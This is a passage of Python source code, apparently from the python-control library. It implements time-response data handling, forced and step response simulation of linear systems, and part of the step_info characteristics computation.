# Check and store labels, if present
self.state_labels = _process_labels(
state_labels, "state", self.nstates)
#
# Input vector (optional)
#
# If present, the shape and dimensions of the input vector should be
# consistent with the trace count computed above.
#
if inputs is None:
self.u = None
self.ninputs = 0
else:
self.u = np.array(inputs)
# Make sure the shape is OK and figure out the nuumber of inputs
if multi_trace and self.u.ndim == 3 and \
self.u.shape[1] == self.ntraces:
self.ninputs = self.u.shape[0]
elif multi_trace and self.u.ndim == 2 and \
self.u.shape[0] == self.ntraces:
self.ninputs = 1
elif not multi_trace and self.u.ndim == 2 and \
self.ntraces == 0:
self.ninputs = self.u.shape[0]
elif not multi_trace and self.u.ndim == 1:
self.ninputs = 1
# Reshape the data to be 2D for consistency
self.u = self.u.reshape(self.ninputs, -1)
else:
raise ValueError("Input vector is the wrong shape")
# Make sure time dimension of output is the right length
if self.t.shape[-1] != self.u.shape[-1]:
raise ValueError("Input vector does not match time vector")
# Check and store labels, if present
self.input_labels = _process_labels(
input_labels, "input", self.ninputs)
# Figure out if the system is SISO
if issiso is None:
# Figure out based on the data
if self.ninputs == 1:
issiso = (self.noutputs == 1)
elif self.ninputs > 1:
issiso = False
else:
# Missing input data => can't resolve
raise ValueError("Can't determine if system is SISO")
elif issiso is True and (self.ninputs > 1 or self.noutputs > 1):
raise ValueError("Keyword `issiso` does not match data")
# Set the value to be used for future processing
self.issiso = issiso
# Keep track of whether to squeeze inputs, outputs, and states
if not (squeeze is True or squeeze is None or squeeze is False):
raise ValueError("Unknown squeeze value")
self.squeeze = squeeze
# Keep track of whether to transpose for MATLAB/scipy.signal
self.transpose = transpose
# Store legacy keyword values (only needed for legacy interface)
self.return_x = return_x
def __call__(self, **kwargs):
"""Change value of processing keywords.
Calling the time response object will create a copy of the object and
change the values of the keywords used to control the ``outputs``,
``states``, and ``inputs`` properties.
Parameters
----------
squeeze : bool, optional
If squeeze=True, access to the output response will remove
single-dimensional entries from the shape of the inputs, outputs,
and states even if the system is not SISO. If squeeze=False, keep
the input as a 2D or 3D array (indexed by the input (if
multi-input), trace (if single input) and time) and the output and
states as a 3D array (indexed by the output/state, trace, and
time) even if the system is SISO.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`).
Default value is False.
return_x : bool, optional
If True, return the state vector when enumerating result by
assigning to a tuple (default = False).
input_labels, output_labels, state_labels: array of str
Labels for the inputs, outputs, and states, given as a
list of strings matching the appropriate signal dimension.
"""
# Make a copy of the object
response = copy(self)
# Update any keywords that we were passed
response.transpose = kwargs.pop('transpose', self.transpose)
response.squeeze = kwargs.pop('squeeze', self.squeeze)
response.return_x = kwargs.pop('return_x', self.squeeze)
# Check for new labels
input_labels = kwargs.pop('input_labels', None)
if input_labels is not None:
response.input_labels = _process_labels(
input_labels, "input", response.ninputs)
output_labels = kwargs.pop('output_labels', None)
if output_labels is not None:
response.output_labels = _process_labels(
output_labels, "output", response.noutputs)
state_labels = kwargs.pop('state_labels', None)
if state_labels is not None:
response.state_labels = _process_labels(
state_labels, "state", response.nstates)
# Make sure no unknown keywords were passed
if len(kwargs) != 0:
raise ValueError("Unknown parameter(s) %s" % kwargs)
return response
@property
def time(self):
"""Time vector.
Time values of the input/output response(s).
:type: 1D array"""
return self.t
# Getter for output (implements squeeze processing)
@property
def outputs(self):
"""Time response output vector.
Output response of the system, indexed by either the output and time
(if only a single input is given) or the output, trace, and time
(for multiple traces). See :attr:`TimeResponseData.squeeze` for a
description of how this can be modified using the `squeeze` keyword.
:type: 1D, 2D, or 3D array
"""
t, y = _process_time_response(
self.t, self.y, issiso=self.issiso,
transpose=self.transpose, squeeze=self.squeeze)
return y
# Getter for states (implements squeeze processing)
@property
def states(self):
"""Time response state vector.
Time evolution of the state vector, indexed indexed by either the
state and time (if only a single trace is given) or the state, trace,
and time (for multiple traces). See :attr:`TimeResponseData.squeeze`
for a description of how this can be modified using the `squeeze`
keyword.
:type: 2D or 3D array
"""
if self.x is None:
return None
elif self.squeeze is True:
x = self.x.squeeze()
elif self.ninputs == 1 and self.noutputs == 1 and \
self.ntraces == 1 and self.x.ndim == 3 and \
self.squeeze is not False:
# Single-input, single-output system with single trace
x = self.x[:, 0, :]
else:
# Return the full set of data
x = self.x
# Transpose processing
if self.transpose:
x = np.transpose(x, np.roll(range(x.ndim), 1))
return x
# Getter for inputs (implements squeeze processing)
@property
def inputs(self):
"""Time response input vector.
Input(s) to the system, indexed by input (optiona), trace (optional),
and time. If a 1D vector is passed, the input corresponds to a
scalar-valued input. If a 2D vector is passed, then it can either
represent multiple single-input traces or a single multi-input trace.
The optional ``multi_trace`` keyword should be used to disambiguate
the two. If a 3D vector is passed, then it represents a multi-trace,
multi-input signal, indexed by input, trace, and time.
See :attr:`TimeResponseData.squeeze` for a description of how the
dimensions of the input vector can be modified using the `squeeze`
keyword.
:type: 1D or 2D array
"""
if self.u is None:
return None
t, u = _process_time_response(
self.t, self.u, issiso=self.issiso,
transpose=self.transpose, squeeze=self.squeeze)
return u
# Getter for legacy state (implements non-standard squeeze processing)
@property
def _legacy_states(self):
"""Time response state vector (legacy version).
Time evolution of the state vector, indexed indexed by either the
state and time (if only a single trace is given) or the state,
trace, and time (for multiple traces).
The `legacy_states` property is not affected by the `squeeze` keyword
and hence it will always have these dimensions.
:type: 2D or 3D array
"""
if self.x is None:
return None
elif self.ninputs == 1 and self.noutputs == 1 and \
self.ntraces == 1 and self.x.ndim == 3:
# Single-input, single-output system with single trace
x = self.x[:, 0, :]
else:
# Return the full set of data
x = self.x
# Transpose processing
if self.transpose:
x = np.transpose(x, np.roll(range(x.ndim), 1))
return x
# Implement iter to allow assigning to a tuple
def __iter__(self):
if not self.return_x:
return iter((self.time, self.outputs))
return iter((self.time, self.outputs, self._legacy_states))
# Implement (thin) getitem to allow access via legacy indexing
def __getitem__(self, index):
# See if we were passed a slice
if isinstance(index, slice):
if (index.start is None or index.start == 0) and index.stop == 2:
return (self.time, self.outputs)
# Otherwise assume we were passed a single index
if index == 0:
return self.time
if index == 1:
return self.outputs
if index == 2:
return self._legacy_states
raise IndexError
# Implement (thin) len to emulate legacy testing interface
def __len__(self):
return 3 if self.return_x else 2
# Process signal labels
def _process_labels(labels, signal, length):
"""Process time response signal labels.
Parameters
----------
labels : list of str or dict
Description of the labels for the signal. This can be a list of
strings or a dict giving the index of each signal (used in iosys).
signal : str
Name of the signal being processed (for error messages).
length : int
Number of labels required.
Returns
-------
labels : list of str
List of labels.
"""
if labels is None or len(labels) == 0:
return None
# See if we got passed a dictionary (from iosys)
if isinstance(labels, dict):
# Form inverse dictionary
ivd = {v: k for k, v in labels.items()}
try:
# Turn into a list
labels = [ivd[n] for n in range(len(labels))]
except KeyError:
raise ValueError("Name dictionary for %s is incomplete" % signal)
# Convert labels to a list
labels = list(labels)
# Make sure the signal list is the right length and type
if len(labels) != length:
raise ValueError("List of %s labels is the wrong length" % signal)
elif not all([isinstance(label, str) for label in labels]):
raise ValueError("List of %s labels must all be strings" % signal)
return labels
# Helper function for checking array-like parameters
def _check_convert_array(in_obj, legal_shapes, err_msg_start, squeeze=False,
transpose=False):
"""Helper function for checking array_like parameters.
* Check type and shape of ``in_obj``.
* Convert ``in_obj`` to an array if necessary.
* Change shape of ``in_obj`` according to parameter ``squeeze``.
* If ``in_obj`` is a scalar (number) it is converted to an array with
a legal shape, that is filled with the scalar value.
The function raises an exception when it detects an error.
Parameters
----------
in_obj : array like object
The array or matrix which is checked.
legal_shapes : list of tuple
A list of shapes that in_obj can legally have.
The special value "any" means that there can be any
number of elements in a certain dimension.
* ``(2, 3)`` describes an array with 2 rows and 3 columns
* ``(2, "any")`` describes an array with 2 rows and any number of
columns
err_msg_start : str
String that is prepended to the error messages, when this function
raises an exception. It should be used to identify the argument which
is currently checked.
squeeze : bool
If True, all dimensions with only one element are removed from the
array. If False the array's shape is unmodified.
For example:
``array([[1,2,3]])`` is converted to ``array([1, 2, 3])``
transpose : bool, optional
If True, assume that 2D input arrays are transposed from the standard
format. Used to convert MATLAB-style inputs to our format.
Returns
-------
out_array : array
The checked and converted contents of ``in_obj``.
"""
# convert nearly everything to an array.
out_array = np.asarray(in_obj)
if (transpose):
out_array = np.transpose(out_array)
# Test element data type, elements must be numbers
legal_kinds = set(("i", "f", "c")) # integer, float, complex
if out_array.dtype.kind not in legal_kinds:
err_msg = "Wrong element data type: '{d}'. Array elements " \
"must be numbers.".format(d=str(out_array.dtype))
raise TypeError(err_msg_start + err_msg)
# If array is zero dimensional (in_obj is scalar):
# create array with legal shape filled with the original value.
if out_array.ndim == 0:
for s_legal in legal_shapes:
# search for shape that does not contain the special symbol any.
if "any" in s_legal:
continue
the_val = out_array[()]
out_array = np.empty(s_legal, 'd')
out_array.fill(the_val)
break
# Test shape
def shape_matches(s_legal, s_actual):
"""Test if two shape tuples match"""
# Array must have required number of dimensions
if len(s_legal) != len(s_actual):
return False
# All dimensions must contain required number of elements. Joker: "all"
for n_legal, n_actual in zip(s_legal, s_actual):
if n_legal == "any":
continue
if n_legal != n_actual:
return False
return True
# Iterate over legal shapes, and see if any matches out_array's shape.
for s_legal in legal_shapes:
if shape_matches(s_legal, out_array.shape):
break
else:
legal_shape_str = " or ".join([str(s) for s in legal_shapes])
err_msg = "Wrong shape (rows, columns): {a}. Expected: {e}." \
.format(e=legal_shape_str, a=str(out_array.shape))
raise ValueError(err_msg_start + err_msg)
# Convert shape
if squeeze:
out_array = np.squeeze(out_array)
# We don't want zero dimensional arrays
if out_array.shape == tuple():
out_array = out_array.reshape((1,))
return out_array
# Forced response of a linear system
def forced_response(sys, T=None, U=0., X0=0., transpose=False,
interpolate=False, return_x=None, squeeze=None):
"""Simulate the output of a linear system.
As a convenience for parameters `U`, `X0`:
Numbers (scalars) are converted to constant arrays with the correct shape.
The correct shape is inferred from arguments `sys` and `T`.
For information on the **shape** of parameters `U`, `T`, `X0` and
return values `T`, `yout`, `xout`, see :ref:`time-series-convention`.
Parameters
----------
sys : StateSpace or TransferFunction
LTI system to simulate
T : array_like, optional for discrete LTI `sys`
Time steps at which the input is defined; values must be evenly spaced.
If None, `U` must be given and `len(U)` time steps of sys.dt are
simulated. If sys.dt is None or True (undetermined time step), a time
step of 1.0 is assumed.
U : array_like or float, optional
Input array giving input at each time `T`.
If `U` is None or 0, `T` must be given, even for discrete
time systems. In this case, for continuous time systems, a direct
calculation of the matrix exponential is used, which is faster than the
general interpolating algorithm used otherwise.
X0 : array_like or float, default=0.
Initial condition.
transpose : bool, default=False
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`).
interpolate : bool, default=False
If True and system is a discrete time system, the input will
be interpolated between the given time steps and the output
will be given at system sampling rate. Otherwise, only return
the output at the times given in `T`. No effect on continuous
time simulations.
return_x : bool, default=None
Used if the time response data is assigned to a tuple:
* If False, return only the time and output vectors.
* If True, also return the the state vector.
* If None, determine the returned variables by
config.defaults['forced_response.return_x'], which was True
before version 0.9 and is False since then.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO) then
the output response is returned as a 1D array (indexed by time). If
`squeeze` is True, remove single-dimensional entries from the shape of
the output even if the system is not SISO. If `squeeze` is False, keep
the output as a 2D array (indexed by the output number and time)
even if the system is SISO. The default behavior can be overridden by
config.defaults['control.squeeze_time_response'].
Returns
-------
results : TimeResponseData
Time response represented as a :class:`TimeResponseData` object
containing the following properties:
* time (array): Time values of the output.
* outputs (array): Response of the system. If the system is SISO and
`squeeze` is not True, the array is 1D (indexed by time). If the
system is not SISO or `squeeze` is False, the array is 2D (indexed
by output and time).
* states (array): Time evolution of the state vector, represented as
a 2D array indexed by state and time.
* inputs (array): Input(s) to the system, indexed by input and time.
The return value of the system can also be accessed by assigning the
function to a tuple of length 2 (time, output) or of length 3 (time,
output, state) if ``return_x`` is ``True``.
See Also
--------
step_response, initial_response, impulse_response
Notes
-----
For discrete time systems, the input/output response is computed using the
:func:`scipy.signal.dlsim` function.
For continuous time systems, the output is computed using the matrix
exponential `exp(A t)` and assuming linear interpolation of the inputs
between time points.
Examples
--------
>>> T, yout, xout = forced_response(sys, T, u, X0)
See :ref:`time-series-convention` and
:ref:`package-configuration-parameters`.
"""
if not isinstance(sys, (StateSpace, TransferFunction)):
raise TypeError('Parameter ``sys``: must be a ``StateSpace`` or'
' ``TransferFunction``)')
# If return_x was not specified, figure out the default
if return_x is None:
return_x = config.defaults['forced_response.return_x']
# If return_x is used for TransferFunction, issue a warning
if return_x and isinstance(sys, TransferFunction):
warnings.warn(
"return_x specified for a transfer function system. Internal "
"conversion to state space used; results may meaningless.")
# If we are passed a transfer function and X0 is non-zero, warn the user
if isinstance(sys, TransferFunction) and np.any(X0 != 0):
warnings.warn(
"Non-zero initial condition given for transfer function system. "
"Internal conversion to state space used; may not be consistent "
"with given X0.")
sys = _convert_to_statespace(sys)
A, B, C, D = np.asarray(sys.A), np.asarray(sys.B), np.asarray(sys.C), \
np.asarray(sys.D)
# d_type = A.dtype
n_states = A.shape[0]
n_inputs = B.shape[1]
n_outputs = C.shape[0]
# Convert inputs to numpy arrays for easier shape checking
if U is not None:
U = np.asarray(U)
if T is not None:
# T must be array-like
T = np.asarray(T)
# Set and/or check time vector in discrete time case
if isdtime(sys):
if T is None:
if U is None or (U.ndim == 0 and U == 0.):
raise ValueError('Parameters ``T`` and ``U`` can\'t both be '
'zero for discrete-time simulation')
# Set T to equally spaced samples with same length as U
if U.ndim == 1:
n_steps = U.shape[0]
else:
n_steps = U.shape[1]
dt = 1. if sys.dt in [True, None] else sys.dt
T = np.array(range(n_steps)) * dt
else:
# Make sure the input vector and time vector have same length
if (U.ndim == 1 and U.shape[0] != T.shape[0]) or \
(U.ndim > 1 and U.shape[1] != T.shape[0]):
raise ValueError('Parameter ``T`` must have same elements as'
' the number of columns in input array ``U``')
if U.ndim == 0:
U = np.full((n_inputs, T.shape[0]), U)
else:
if T is None:
raise ValueError('Parameter ``T`` is mandatory for continuous '
'time systems.')
# Test if T has shape (n,) or (1, n);
T = _check_convert_array(T, [('any',), (1, 'any')],
'Parameter ``T``: ', squeeze=True,
transpose=transpose)
n_steps = T.shape[0] # number of simulation steps
# equally spaced also implies strictly monotonic increase,
dt = (T[-1] - T[0]) / (n_steps - 1)
if not np.allclose(np.diff(T), dt):
raise ValueError("Parameter ``T``: time values must be equally "
"spaced.")
# create X0 if not given, test if X0 has correct shape
X0 = _check_convert_array(X0, [(n_states,), (n_states, 1)],
'Parameter ``X0``: ', squeeze=True)
# Test if U has correct shape and type
legal_shapes = [(n_steps,), (1, n_steps)] if n_inputs == 1 else \
[(n_inputs, n_steps)]
U = _check_convert_array(U, legal_shapes,
'Parameter ``U``: ', squeeze=False,
transpose=transpose)
xout = np.zeros((n_states, n_steps))
xout[:, 0] = X0
yout = np.zeros((n_outputs, n_steps))
# Separate out the discrete and continuous time cases
if isctime(sys, strict=True):
# Solve the differential equation, copied from scipy.signal.ltisys.
# Faster algorithm if U is zero
# (if not None, it was converted to array above)
if U is None or np.all(U == 0):
# Solve using matrix exponential
expAdt = sp.linalg.expm(A * dt)
for i in range(1, n_steps):
xout[:, i] = expAdt @ xout[:, i-1]
yout = C @ xout
# General algorithm that interpolates U in between output points
else:
# convert input from 1D array to 2D array with only one row
if U.ndim == 1:
U = U.reshape(1, -1) # pylint: disable=E1103
# Algorithm: to integrate from time 0 to time dt, with linear
# interpolation between inputs u(0) = u0 and u(dt) = u1, we solve
# xdot = A x + B u, x(0) = x0
# udot = (u1 - u0) / dt, u(0) = u0.
#
# Solution is
# [ x(dt) ] [ A*dt B*dt 0 ] [ x0 ]
# [ u(dt) ] = exp [ 0 0 I ] [ u0 ]
# [u1 - u0] [ 0 0 0 ] [u1 - u0]
M = np.block([[A * dt, B * dt, np.zeros((n_states, n_inputs))],
[np.zeros((n_inputs, n_states + n_inputs)),
np.identity(n_inputs)],
[np.zeros((n_inputs, n_states + 2 * n_inputs))]])
expM = sp.linalg.expm(M)
Ad = expM[:n_states, :n_states]
Bd1 = expM[:n_states, n_states+n_inputs:]
Bd0 = expM[:n_states, n_states:n_states + n_inputs] - Bd1
for i in range(1, n_steps):
xout[:, i] = (Ad @ xout[:, i-1]
+ Bd0 @ U[:, i-1] + Bd1 @ U[:, i])
yout = C @ xout + D @ U
tout = T
else:
# Discrete type system => use SciPy signal processing toolbox
# sp.signal.dlsim assumes T[0] == 0
spT = T - T[0]
if sys.dt is not True and sys.dt is not None:
# Make sure that the time increment is a multiple of sampling time
# First make sure that time increment is bigger than sampling time
# (with allowance for small precision errors)
if dt < sys.dt and not np.isclose(dt, sys.dt):
raise ValueError("Time steps ``T`` must match sampling time")
# Now check to make sure it is a multiple (with check against
# sys.dt because floating point mod can have small errors
if not (np.isclose(dt % sys.dt, 0) or
np.isclose(dt % sys.dt, sys.dt)):
raise ValueError("Time steps ``T`` must be multiples of "
"sampling time")
sys_dt = sys.dt
# sp.signal.dlsim returns not enough samples if
# T[-1] - T[0] < sys_dt * decimation * (n_steps - 1)
# due to rounding errors.
# https://github.com/scipyscipy/blob/v1.6.1/scipy/signal/ltisys.py#L3462
scipy_out_samples = int(np.floor(spT[-1] / sys_dt)) + 1
if scipy_out_samples < n_steps:
# parantheses: order of evaluation is important
spT[-1] = spT[-1] * (n_steps / (spT[-1] / sys_dt + 1))
else:
sys_dt = dt # For unspecified sampling time, use time incr
# Discrete time simulation using signal processing toolbox
dsys = (A, B, C, D, sys_dt)
# Use signal processing toolbox for the discrete time simulation
# Transpose the input to match toolbox convention
tout, yout, xout = sp.signal.dlsim(dsys, np.transpose(U), spT, X0)
tout = tout + T[0]
if not interpolate:
# If dt is different from sys.dt, resample the output
inc = int(round(dt / sys_dt))
tout = T # Return exact list of time steps
yout = yout[::inc, :]
xout = xout[::inc, :]
else:
# Interpolate the input to get the right number of points
U = sp.interpolate.interp1d(T, U)(tout)
# Transpose the output and state vectors to match local convention
xout = np.transpose(xout)
yout = np.transpose(yout)
return TimeResponseData(
tout, yout, xout, U, issiso=sys.issiso(),
transpose=transpose, return_x=return_x, squeeze=squeeze)
# Process time responses in a uniform way
def _process_time_response(
tout, yout, issiso=False, transpose=None, squeeze=None):
"""Process time response signals.
This function processes the outputs (or inputs) of time response
functions and processes the transpose and squeeze keywords.
Parameters
----------
T : 1D array
Time values of the output. Ignored if None.
yout : ndarray
Response of the system. This can either be a 1D array indexed by time
(for SISO systems), a 2D array indexed by output and time (for MIMO
systems with no input indexing, such as initial_response or forced
response) or a 3D array indexed by output, input, and time.
issiso : bool, optional
If ``True``, process data as single-input, single-output data.
Default is ``False``.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO) then the
output response is returned as a 1D array (indexed by time). If
squeeze=True, remove single-dimensional entries from the shape of the
output even if the system is not SISO. If squeeze=False, keep the
output as a 3D array (indexed by the output, input, and time) even if
the system is SISO. The default value can be set using
config.defaults['control.squeeze_time_response'].
Returns
-------
T : 1D array
Time values of the output.
yout : ndarray
Response of the system. If the system is SISO and squeeze is not
True, the array is 1D (indexed by time). If the system is not SISO or
squeeze is False, the array is either 2D (indexed by output and time)
or 3D (indexed by input, output, and time).
"""
# If squeeze was not specified, figure out the default (might remain None)
if squeeze is None:
squeeze = config.defaults['control.squeeze_time_response']
# Figure out whether and how to squeeze output data
if squeeze is True: # squeeze all dimensions
yout = np.squeeze(yout)
elif squeeze is False: # squeeze no dimensions
pass
elif squeeze is None: # squeeze signals if SISO
if issiso:
if yout.ndim == 3:
yout = yout[0][0] # remove input and output
else:
yout = yout[0] # remove input
else:
raise ValueError("Unknown squeeze value")
# See if we need to transpose the data back into MATLAB form
if transpose:
# Transpose time vector in case we are using np.matrix
tout = np.transpose(tout)
# For signals, put the last index (time) into the first slot
yout = np.transpose(yout, np.roll(range(yout.ndim), 1))
# Return time, output, and (optionally) state
return tout, yout
def _get_ss_simo(sys, input=None, output=None, squeeze=None):
"""Return a SISO or SIMO state-space version of sys.
This function converts the given system to a state space system in
preparation for simulation and sets the system matrixes to match the
desired input and output.
If input is not specified, select first input and issue warning (legacy
behavior that should eventually not be used).
If the output is not specified, report on all outputs.
"""
# If squeeze was not specified, figure out the default
if squeeze is None:
squeeze = config.defaults['control.squeeze_time_response']
sys_ss = _convert_to_statespace(sys)
if sys_ss.issiso():
return squeeze, sys_ss
elif squeeze is None and (input is None or output is None):
# Don't squeeze outputs if resulting system turns out to be siso
# Note: if we expand input to allow a tuple, need to update this check
squeeze = False
warn = False
if input is None:
# issue warning if input is not given
warn = True
input = 0
if output is None:
return squeeze, _mimo2simo(sys_ss, input, warn_conversion=warn)
else:
return squeeze, _mimo2siso(sys_ss, input, output, warn_conversion=warn)
def step_response(sys, T=None, X0=0., input=None, output=None, T_num=None,
transpose=False, return_x=False, squeeze=None):
# pylint: disable=W0622
"""Compute the step response for a linear system.
If the system has multiple inputs and/or multiple outputs, the step
response is computed for each input/output pair, with all other inputs set
to zero. Optionally, a single input and/or single output can be selected,
in which case all other inputs are set to 0 and all other outputs are
ignored.
For information on the **shape** of parameters `T`, `X0` and
return values `T`, `yout`, see :ref:`time-series-convention`.
Parameters
----------
sys : StateSpace or TransferFunction
LTI system to simulate
T : array_like or float, optional
Time vector, or simulation time duration if a number. If T is not
provided, an attempt is made to create it automatically from the
dynamics of sys. If sys is continuous-time, the time increment dt
is chosen small enough to show the fastest mode, and the simulation
time period tfinal long enough to show the slowest mode, excluding
poles at the origin and pole-zero cancellations. If this results in
too many time steps (>5000), dt is reduced. If sys is discrete-time,
only tfinal is computed, and final is reduced if it requires too
many simulation steps.
X0 : array_like or float, optional
Initial condition (default = 0). Numbers are converted to constant
arrays with the correct shape.
input : int, optional
Only compute the step response for the listed input. If not
specified, the step responses for each independent input are
computed (as separate traces).
output : int, optional
Only report the step response for the listed output. If not
specified, all outputs are reported.
T_num : int, optional
Number of time steps to use in simulation if T is not provided as an
array (autocomputed if not given); ignored if sys is discrete-time.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
return_x : bool, optional
If True, return the state vector when assigning to a tuple (default =
False). See :func:`forced_response` for more details.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO) then the
output response is returned as a 1D array (indexed by time). If
squeeze=True, remove single-dimensional entries from the shape of the
output even if the system is not SISO. If squeeze=False, keep the
output as a 3D array (indexed by the output, input, and time) even if
the system is SISO. The default value can be set using
config.defaults['control.squeeze_time_response'].
Returns
-------
results : TimeResponseData
Time response represented as a :class:`TimeResponseData` object
containing the following properties:
* time (array): Time values of the output.
* outputs (array): Response of the system. If the system is SISO and
squeeze is not True, the array is 1D (indexed by time). If the
system is not SISO or ``squeeze`` is False, the array is 3D (indexed
by the output, trace, and time).
* states (array): Time evolution of the state vector, represented as
either a 2D array indexed by state and time (if SISO) or a 3D array
indexed by state, trace, and time. Not affected by ``squeeze``.
* inputs (array): Input(s) to the system, indexed in the same manner
as ``outputs``.
The return value of the system can also be accessed by assigning the
function to a tuple of length 2 (time, output) or of length 3 (time,
output, state) if ``return_x`` is ``True``.
See Also
--------
forced_response, initial_response, impulse_response
Notes
-----
This function uses the `forced_response` function with the input set to a
unit step.
Examples
--------
>>> T, yout = step_response(sys, T, X0)
"""
# Create the time and input vectors
if T is None or np.asarray(T).size == 1:
T = _default_time_vector(sys, N=T_num, tfinal=T, is_step=True)
U = np.ones_like(T)
# If we are passed a transfer function and X0 is non-zero, warn the user
if isinstance(sys, TransferFunction) and np.any(X0 != 0):
warnings.warn(
"Non-zero initial condition given for transfer function system. "
"Internal conversion to state space used; may not be consistent "
"with given X0.")
# Convert to state space so that we can simulate
sys = _convert_to_statespace(sys)
# Set up arrays to handle the output
ninputs = sys.ninputs if input is None else 1
noutputs = sys.noutputs if output is None else 1
yout = np.empty((noutputs, ninputs, np.asarray(T).size))
xout = np.empty((sys.nstates, ninputs, np.asarray(T).size))
uout = np.empty((ninputs, ninputs, np.asarray(T).size))
# Simulate the response for each input
for i in range(sys.ninputs):
# If input keyword was specified, only simulate for that input
if isinstance(input, int) and i != input:
continue
# Create a set of single inputs system for simulation
squeeze, simo = _get_ss_simo(sys, i, output, squeeze=squeeze)
response = forced_response(simo, T, U, X0, squeeze=True)
inpidx = i if input is None else 0
yout[:, inpidx, :] = response.y
xout[:, inpidx, :] = response.x
uout[:, inpidx, :] = U
# Figure out if the system is SISO or not
issiso = sys.issiso() or (input is not None and output is not None)
return TimeResponseData(
response.time, yout, xout, uout, issiso=issiso,
transpose=transpose, return_x=return_x, squeeze=squeeze)
def step_info(sysdata, T=None, T_num=None, yfinal=None,
SettlingTimeThreshold=0.02, RiseTimeLimits=(0.1, 0.9)):
"""
Step response characteristics (Rise time, Settling Time, Peak and others).
Parameters
----------
sysdata : StateSpace or TransferFunction or array_like
The system data. Either LTI system to similate (StateSpace,
TransferFunction), or a time series of step response data.
T : array_like or float, optional
Time vector, or simulation time duration if a number (time vector is
autocomputed if not given, see :func:`step_response` for more detail).
Required, if sysdata is a time series of response data.
T_num : int, optional
Number of time steps to use in simulation if T is not provided as an
array; autocomputed if not given; ignored if sysdata is a
discrete-time system or a time series or response data.
yfinal : scalar or array_like, optional
Steady-state response. If not given, sysdata.dcgain() is used for
systems to simulate and the last value of the the response data is
used for a given time series of response data. Scalar for SISO,
(noutputs, ninputs) array_like for MIMO systems.
SettlingTimeThreshold : float, optional
Defines the error to compute settling time (default = 0.02)
RiseTimeLimits : tuple (lower_threshold, upper_theshold)
Defines the lower and upper threshold for RiseTime computation
Returns
-------
S : dict or list of list of dict
If `sysdata` corresponds to a SISO system, S is a dictionary
containing:
RiseTime:
Time from 10% to 90% of the steady-state value.
SettlingTime:
Time to enter inside a default error of 2%
SettlingMin:
Minimum value after RiseTime
SettlingMax:
Maximum value after RiseTime
Overshoot:
Percentage of the Peak relative to steady value
Undershoot:
Percentage of undershoot
Peak:
Absolute peak value
PeakTime:
time of the Peak
SteadyStateValue:
Steady-state value
If `sysdata` corresponds to a MIMO system, `S` is a 2D list of dicts.
To get the step response characteristics from the j-th input to the
i-th output, access ``S[i][j]``
See Also
--------
step, lsim, initial, impulse
Examples
--------
>>> from control import step_info, TransferFunction
>>> sys = TransferFunction([-1, 1], [1, 1, 1])
>>> S = step_info(sys)
>>> for k in S:
... print(f"{k}: {S[k]:3.4}")
...
RiseTime: 1.256
SettlingTime: 9.071
SettlingMin: 0.9011
SettlingMax: 1.208
Overshoot: 20.85
Undershoot: 27.88
Peak: 1.208
PeakTime: 4.187
SteadyStateValue: 1.0
MIMO System: Simulate until a final time of 10. Get the step response
characteristics for the second input and specify a 5% error until the
signal is considered settled.
>>> from numpy import sqrt
>>> from control import step_info, StateSpace
>>> sys = StateSpace([[-1., -1.],
... [1., 0.]],
... [[-1./sqrt(2.), 1./sqrt(2.)],
... [0, 0]],
... [[sqrt(2.), -sqrt(2.)]],
... [[0, 0]])
>>> S = step_info(sys, T=10., SettlingTimeThreshold=0.05)
>>> for k, v in S[0][1].items():
... print(f"{k}: {float(v):3.4}")
RiseTime: 1.212
SettlingTime: 6.061
SettlingMin: -1.209
SettlingMax: -0.9184
Overshoot: 20.87
Undershoot: 28.02
Peak: 1.209
PeakTime: 4.242
SteadyStateValue: -1.0
"""
if isinstance(sysdata, (StateSpace, TransferFunction)):
if T is None or np.asarray(T).size == 1:
T = _default_time_vector(sysdata, N=T_num, tfinal=T, is_step=True)
T, Yout = step_response(sysdata, T, squeeze=False)
if yfinal:
InfValues = np.atleast_2d(yfinal)
else:
InfValues = np.atleast_2d(sysdata.dcgain())
retsiso = sysdata.issiso()
noutputs = sysdata.noutputs
ninputs = sysdata.ninputs
else:
# Time series of response data
errmsg = ("`sys` must be a LTI system, or time response data"
" with a shape following the python-control"
" time series data convention.")
try:
Yout = np.array(sysdata, dtype=float)
except ValueError:
raise ValueError(errmsg)
if Yout.ndim == 1 or (Yout.ndim == 2 and Yout.shape[0] == 1):
Yout = Yout[np.newaxis, np.newaxis, :]
retsiso = True
elif Yout.ndim == 3:
retsiso = False
else:
raise ValueError(errmsg)
if T is None or Yout.shape[2] != len(np.squeeze(T)):
raise ValueError("For time response data, a matching time vector"
" must be given")
T = np.squeeze(T)
noutputs = Yout.shape[0]
ninputs = Yout.shape[1]
InfValues = np.atleast_2d(yfinal) if yfinal else Yout[:, :, -1]
ret = []
for i in range(noutputs):
retrow = []
for j in range(ninputs):
yout = Yout[i, j, :]
# Steady state value
InfValue = InfValues[i, j]
sgnInf = np.sign(InfValue.real)
rise_time: float = np.NaN
settling_time: float = np.NaN
settling_min: float = np.NaN
settling_max: float = np.NaN
peak_value: float = np.Inf
peak_time: float = np.Inf
undershoot: float = np.NaN
overshoot: float = np.NaN
steady_state_value: complex = np.NaN
if not np.isnan(InfValue) and not np.isinf(InfValue):
# RiseTime
tr_lower_index = np.where(
sgnInf * (yout - RiseTimeLimits[0] * InfValue) >= 0
)[0][0]
tr_upper_index = np.where(
sgnInf * (yout - RiseTimeLimits[1] * InfValue) >= 0
)[0][0]
rise_time = T[tr_upper_index] - T[tr_lower_index]
# SettlingTime
settled = np.where(
np.abs(yout/InfValue-1) >= SettlingTimeThreshold)[0][-1]+1
# MIMO systems can have unsettled channels without infinite
# InfValue
if settled < len(T):
settling_time = T[settled]
settling_min = min((yout[tr_upper_index:]).min(), InfValue)
settling_max = max((yout[tr_upper_index:]).max(), InfValue)
# Overshoot
y_os = (sgnInf * yout).max()
dy_os = np.abs(y_os) - np.abs(InfValue)
if dy_os > 0:
overshoot = np.abs(100. * dy_os / InfValue)
else:
overshoot = 0
